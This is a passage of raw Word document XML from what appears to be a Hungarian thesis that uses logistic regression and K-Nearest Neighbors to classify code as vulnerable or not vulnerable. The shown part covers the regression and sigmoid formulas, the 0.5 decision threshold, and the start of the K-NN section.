      </w:r>
      <w:r w:rsidR="000B6108">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>mivel</w:t>
      </w:r>
      <w:r w:rsidR="003C446D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> csak</w:t>
      </w:r>
      <w:r w:rsidR="00FC3EED" w:rsidRPr="00FC3EED">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> bináris kimenet előrejelzésére</w:t>
      </w:r>
      <w:r w:rsidR="00F6075B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> alkalmas</w:t>
      </w:r>
      <w:r w:rsidR="0088066B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, azaz a</w:t>
      </w:r>
      <w:r w:rsidR="00804C8A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z osztály </w:t>
      </w:r>
      <w:r w:rsidR="0088066B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">adott értelmezéssel ellátva (sérülékeny, nem sérülékeny) 0 </w:t>
      </w:r>
      <w:r w:rsidR="00541AF3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>vagy</w:t>
      </w:r>
      <w:r w:rsidR="0088066B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 lehet.</w:t>
      </w:r>
      <w:r w:rsidR="00980DDE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00140E4B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Alapja </w:t>
      </w:r>
      <w:r w:rsidR="00140E4B" w:rsidRPr="00EB050B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00AC7B53" w:rsidRPr="00EB050B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Linear Regression</w:t>
      </w:r>
      <w:r w:rsidR="00140E4B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, mivel a</w:t>
      </w:r>
      <w:r w:rsidR="007C1EDA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r w:rsidR="00140E4B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A338D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>első lépés</w:t>
      </w:r>
      <w:r w:rsidR="007C1EDA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ében ezt regresszió</w:t>
      </w:r>
      <w:r w:rsidR="00B5139B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">s képletet </w:t>
      </w:r>
      <w:r w:rsidR="007C1EDA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>hajtja végre</w:t>
      </w:r>
      <w:r w:rsidR="00F5394C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, ahol </w:t>
      </w:r>
      <w:r w:rsidR="00BD662E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidR="00BD662E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">jelöli a függő változót, </w:t>
      </w:r>
      <w:r w:rsidR="00BD662E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">x </w:t>
      </w:r>
      <w:r w:rsidR="00BD662E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a független változót, a </w:t>
      </w:r>
      <w:r w:rsidR="00BD662E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00BD662E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00BD662E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> és </w:t>
      </w:r>
      <w:r w:rsidR="00BD662E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00BD662E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="007F731F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F731F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">pedig </w:t>
      </w:r>
      <w:r w:rsidR="0050414F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="007F731F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00BD662E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>onstansok</w:t>
      </w:r>
      <w:r w:rsidR="0050414F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidR="00BD662E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5380EC9A" w14:textId="77777777" w:rsidR="00A7267E" w:rsidRDefault="00A7267E" w:rsidP="00456EA0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C14E8F9" w14:textId="1401B8A0" w:rsidR="003E1D5C" w:rsidRPr="00ED0673" w:rsidRDefault="00F16446" w:rsidP="005207A0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
            <m:t>y=</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0</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x</m:t>
          </m:r>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="21147C16" w14:textId="763472B6" w:rsidR="00A7267E" w:rsidRDefault="0074253F" w:rsidP="00FF48AE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00553BBD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidR="00C24A89">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-es-</w:t>
      </w:r>
      <w:r w:rsidR="00691B9B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ábra</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7599">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>: a lineáris regresszió ké</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>plete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678D11D6" w14:textId="304DF09D" w:rsidR="003C69DF" w:rsidRDefault="003C69DF" w:rsidP="00456EA0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="391474C4" w14:textId="063165AA" w:rsidR="00940919" w:rsidRPr="002A6B21" w:rsidRDefault="00FE2091" w:rsidP="001519C0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A m</w:t>
      </w:r>
      <w:r w:rsidR="00D45B29">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ásodik lépés</w:t>
      </w:r>
      <w:r w:rsidR="00F84BD7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidR="00C60D0F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00CD24BC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidR="00C24A89">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00C60D0F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">-es ábra </w:t>
      </w:r>
      <w:r w:rsidR="00C60D0F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidR="00C60D0F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>értékét használja fel</w:t>
      </w:r>
      <w:r w:rsidR="00DB586D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB586D" w:rsidRPr="002A6B21">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a logisztik</w:t>
      </w:r>
      <w:r w:rsidR="001C4697" w:rsidRPr="002A6B21">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ai</w:t>
      </w:r>
      <w:r w:rsidR="00DB586D" w:rsidRPr="002A6B21">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> függvény felépítéséhez. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009C4152" w14:textId="0582A67B" w:rsidR="00135C3D" w:rsidRDefault="00135C3D" w:rsidP="00792DA0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00397F4D" w14:textId="10C7CBC6" w:rsidR="00135C3D" w:rsidRPr="00135C3D" w:rsidRDefault="00135C3D" w:rsidP="005207A0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
            <m:t>p=</m:t>
          </m:r>
          <m:f>
            <m:fPr>
              <m:ctrlPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:i/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
              </m:ctrlPr>
            </m:fPr>
            <m:num>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
                <m:t>1</m:t>
              </m:r>
            </m:num>
            <m:den>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
                <m:t>1+</m:t>
              </m:r>
              <m:sSup>
                <m:sSupPr>
                  <m:ctrlPr>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:i/>
                      <w:lang w:val="hu-HU"/>
                    </w:rPr>
                  </m:ctrlPr>
                </m:sSupPr>
                <m:e>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:lang w:val="hu-HU"/>
                    </w:rPr>
                    <m:t>e</m:t>
                  </m:r>
                </m:e>
                <m:sup>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:lang w:val="hu-HU"/>
                    </w:rPr>
                    <m:t>-y</m:t>
                  </m:r>
                </m:sup>
              </m:sSup>
            </m:den>
          </m:f>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="5BE12EBD" w14:textId="7AB4752F" w:rsidR="00135C3D" w:rsidRDefault="00135C3D" w:rsidP="00FF48AE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00D87B08">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00C24A89">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">-es </w:t>
      </w:r>
      <w:r w:rsidR="00823BF8">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ábra</w:t>
      </w:r>
      <w:r w:rsidRPr="002A6B21">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00852AC0" w:rsidRPr="002A6B21">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="002A6B21">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>logisztikai szigmoid függvény</w:t>
      </w:r>
      <w:r w:rsidR="004D7346" w:rsidRPr="002A6B21">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> képlete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B15A57D" w14:textId="130DE092" w:rsidR="00825390" w:rsidRDefault="00825390" w:rsidP="00456EA0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CAE2BBA" w14:textId="1C9F6FFA" w:rsidR="00A32C39" w:rsidRDefault="003C3A13" w:rsidP="00DC05D2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Ekkor a </w:t>
      </w:r>
      <w:r w:rsidR="00395ADE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">függvény </w:t>
      </w:r>
      <w:r w:rsidR="009C0F0F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">már egy </w:t>
      </w:r>
      <w:r w:rsidR="00021ADA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>valószínűséget köt a függő változóhoz</w:t>
      </w:r>
      <w:r w:rsidR="00DC4359">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00764D74">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> amelyet a </w:t>
      </w:r>
      <w:r w:rsidR="00C24A89">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.2.1.3</w:t>
      </w:r>
      <w:r w:rsidR="00764D74">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-as ábra egy-egy fekete ponttal jelöl a logisztikai függvényen.</w:t>
      </w:r>
      <w:r w:rsidR="003D483A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ez</w:t>
      </w:r>
      <w:r w:rsidR="00021ADA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00056198">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">megadja, hogy mekkora valószínűséggel </w:t>
      </w:r>
      <w:r w:rsidR="00612EC5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>tartozik</w:t>
      </w:r>
      <w:r w:rsidR="00056198">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> az egyes osztályok</w:t>
      </w:r>
      <w:r w:rsidR="00FE3C59">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>hoz</w:t>
      </w:r>
      <w:r w:rsidR="00056198">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009C0F0F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA5E75">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Amennyiben a</w:t>
      </w:r>
      <w:r w:rsidR="00C906A2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0,5-ös</w:t>
      </w:r>
      <w:r w:rsidR="00CA5E75">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> küszöbérték alatt esik, a 0 osztályba sorolható, ellenkező esetben az 1-es osztályba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E066459" w14:textId="77777777" w:rsidR="005261B5" w:rsidRDefault="005261B5" w:rsidP="00461D93">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78CCDAB5" w14:textId="1254ABE0" w:rsidR="005C6647" w:rsidRPr="00921E07" w:rsidRDefault="00D33DD0"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6" w:name="_Toc71471972"/>
      <w:r w:rsidRPr="00921E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>K-Nearest Neighbors</w:t>
      </w:r>
      <w:r w:rsidR="009928CA" w:rsidRPr="00921E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (K-NN)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="3D4E73DE" w14:textId="05BFEFE8" w:rsidR="00CB6F4D" w:rsidRDefault="00CB6F4D" w:rsidP="00461D93">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63BB6C8B" w14:textId="1BF9AF4D" w:rsidR="006240B3" w:rsidRDefault="002260BE" w:rsidP="00992839">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002260BE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A K-NN algoritmus az egyik legegyszerűbb osztályozási algoritmus,</w:t>
      </w:r>
      <w:r w:rsidR="004756CE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> mivel </w:t>
      </w:r>
      <w:r w:rsidR="008A21AA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="004756CE" w:rsidRPr="004756CE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z új eseteket</w:t>
      </w:r>
      <w:r w:rsidR="00962415">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00224A70">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>zok</w:t>
      </w:r>
      <w:r w:rsidR="00962415">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C331F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">K legközelebbi </w:t>
      </w:r>
      <w:r w:rsidR="00962415">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">szomszédaik osztályai alapján </w:t>
      </w:r>
      <w:r w:rsidR="004756CE" w:rsidRPr="004756CE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>osztályozza.</w:t>
      </w:r>
      <w:r w:rsidR="00AC44F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r w:rsidR="00014073">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.2.2.1</w:t>
      </w:r>
      <w:r w:rsidR="00AC44F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">-es ábra többek között szemlélteti, amikor a 3 legközelebbi szomszéd közül 2 db (67%) tartozik az 1-es osztályba és csak 1 db (33%) a 0-ás osztályba. Ekkor az algoritmus az 1-eshez rendeli az </w:t>
      </w:r>
      <w:r w:rsidR="00AC44F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>új esetet.</w:t>
      </w:r>
      <w:r w:rsidR="004F0AAA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF283E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Továbbá azt az esetet is</w:t>
      </w:r>
      <w:r w:rsidR="00B64D43">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> bemutatja</w:t>
      </w:r>
      <w:r w:rsidR="00DF283E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, amikor a 9 legközelebbi szomszéd közül </w:t>
      </w:r>
      <w:r w:rsidR="00E245AF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00DF283E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> db (</w:t>
      </w:r>
      <w:r w:rsidR="00961D02">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>33%</w:t>
      </w:r>
      <w:r w:rsidR="00DF283E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">) tartozik az 1-es osztályba és </w:t>
      </w:r>
      <w:r w:rsidR="00E245AF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00DF283E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> db </w:t>
      </w:r>
      <w:r w:rsidR="00961D02">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">(67%) </w:t>
      </w:r>
      <w:r w:rsidR="00DF283E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a 0-</w:t>
      </w:r>
      <w:r w:rsidR="00E245AF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidR="00DF283E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>s osztályba.</w:t>
      </w:r>
      <w:r w:rsidR="002D3E44">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F0637">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Így a K értékének megválasztás</w:t>
      </w:r>
      <w:r w:rsidR="00631769">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="009F0637">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> már jóval fontosabbá válik</w:t>
      </w:r>
      <w:r w:rsidR="003E316A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, ezt szemlélteti három példán keresztül a </w:t>
      </w:r>
      <w:r w:rsidR="00CC5B29">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2.2.3-as</w:t>
      </w:r>
      <w:r w:rsidR="003E316A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ábra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51659575" w14:textId="5B06CE4B" w:rsidR="004F0AA6" w:rsidRDefault="004F0AA6" w:rsidP="0008410D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F24FA59" w14:textId="4BD29FF8" w:rsidR="0008410D" w:rsidRDefault="0008410D" w:rsidP="00B16801">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4FDCCF" wp14:editId="51558891">
            <wp:extent cx="5399405" cy="1724660"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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1724660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF527CC" w14:textId="3473C403" w:rsidR="0008410D" w:rsidRDefault="0008410D" w:rsidP="0008410D">
      <w:pPr>
